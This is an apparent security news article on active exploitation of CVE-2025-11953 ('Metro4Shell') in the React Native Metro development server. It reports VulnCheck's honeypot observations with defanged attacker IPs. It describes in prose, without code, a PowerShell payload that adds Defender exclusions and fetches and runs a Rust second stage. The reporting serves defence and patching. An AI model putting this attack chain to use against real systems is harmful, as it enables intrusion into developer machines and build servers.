A critical security vulnerability in the Metro Development Server, part of the widely-used “@react-native-community/cli” npm package, is actively being exploited by threat actors. This flaw, tracked as CVE-2025-11953 and dubbed “Metro4Shell,” carries a severe CVSS score of 9.8, enabling remote, unauthenticated attackers to execute arbitrary operating system commands on vulnerable host systems. Cybersecurity firm VulnCheck reported observing the exploitation of this vulnerability beginning on December 21, 2025, over a month after it was initially documented by JFrog in November 2025.
Exploitation of Metro4Shell Poses Significant Risk
Despite remaining largely unacknowledged publicly, these in-the-wild exploits demonstrate a concerning trend of development infrastructure being targeted. VulnCheck’s analysis of an attack observed on its honeypot network revealed threat actors weaponizing CVE-2025-11953 to deploy a Base64-encoded PowerShell script. This script, once decoded, performs several malicious actions, including creating exclusions within Microsoft Defender Antivirus for the current working directory and the temporary folder.
Additionally, the PowerShell script establishes a direct TCP connection to an IP address and port controlled by the attackers, specifically ‘8.218.43[.]248:60124’. From this connection, the script retrieves further data, saves it to a file within the temporary directory, and then executes it. The downloaded secondary payload is written in Rust and incorporates anti-analysis techniques designed to impede static examination by security researchers.
The observed attacks have been linked to several originating IP addresses, including 5.109.182[.]231, 223.6.249[.]141, and 134.209.69[.]155. VulnCheck emphasizes that this activity is not experimental, noting that the consistent delivery of similar payloads over multiple weeks indicates sustained operational use rather than simple vulnerability probing or proof-of-concept testing.
Implications for the React Native Development Ecosystem
The exploitation of CVE-2025-11953 highlights a persistent challenge in securing software development pipelines. As VulnCheck points out, development infrastructure inadvertently becomes production infrastructure the moment it is accessible externally, regardless of its intended purpose. This critical vulnerability in the Metro Development Server, a key component for React Native development, could allow attackers to gain a foothold on developer machines or build servers.
The severity of the Metro4Shell vulnerability lies in its ability to execute arbitrary commands without prior authentication, making it a prime target for initial access. The subsequent deployment of a Rust-based payload with anti-analysis features suggests a sophistication in the threat actors’ operations, aiming for persistent access and potentially further lateral movement within targeted networks.
The lack of broad public acknowledgment of these ongoing exploits is a concerning development. Developers and organizations relying on the “@react-native-community/cli” package should prioritize immediate assessment and remediation efforts. This includes ensuring that the specific version of the package used is not vulnerable and that development environments are adequately secured to prevent unauthorized access.
Moving forward, the focus will likely be on the release and adoption of patched versions of the “@react-native-community/cli” package. The security community will be closely monitoring for further exploitation attempts and the effectiveness of mitigation strategies. Organizations should remain vigilant and proactive in their security posture to defend against such evolving threats targeting critical development tools within the open-source ecosystem.